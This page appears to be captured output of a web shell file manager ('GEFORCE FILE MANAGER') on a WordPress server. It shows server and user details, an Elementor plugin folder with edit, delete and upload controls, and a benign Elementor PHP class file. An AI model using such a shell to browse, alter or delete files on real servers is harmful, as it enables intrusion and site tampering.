[ SYSTEM ]: Linux wordpress 6.1.0-44-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.164-1 (2026-03-09) x86_64
[ SERVER ]: Apache/2.4.66 (Debian) | PHP: 8.2.30
[ USER ]: www-data | IP: 172.19.30.54
GEFORCE FILE MANAGER
/
var
/
www
/
html
/
wordpress
/
wp-content
/
plugins
/
elementor
/
data
/
base
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📁 processor
SET
[ DEL ]
📄 controller.php
8,293 B
SET
[ EDIT ]
|
[ DEL ]
📄 endpoint.php
9,314 B
SET
[ EDIT ]
|
[ DEL ]
📄 processor.php
444 B
SET
[ EDIT ]
|
[ DEL ]
📄 sub-endpoint.php
760 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: sub-endpoint.php
<?php namespace Elementor\Data\Base; /** * TODO: Add test. */ abstract class SubEndpoint extends Endpoint { /** * @var Endpoint */ protected $parent_endpoint; /** * @var string */ protected $parent_route = ''; public function __construct( $parent_route, $parent_endpoint ) { $this->parent_endpoint = $parent_endpoint; $this->parent_route = $parent_route; parent::__construct( $this->parent_endpoint->controller ); } /** * Get parent route. * * @return \Elementor\Data\Base\Endpoint */ public function get_parent() { return $this->parent_endpoint; } public function get_base_route() { $controller_name = $this->controller->get_name(); return $controller_name . '/' . $this->parent_route . $this->get_name(); } }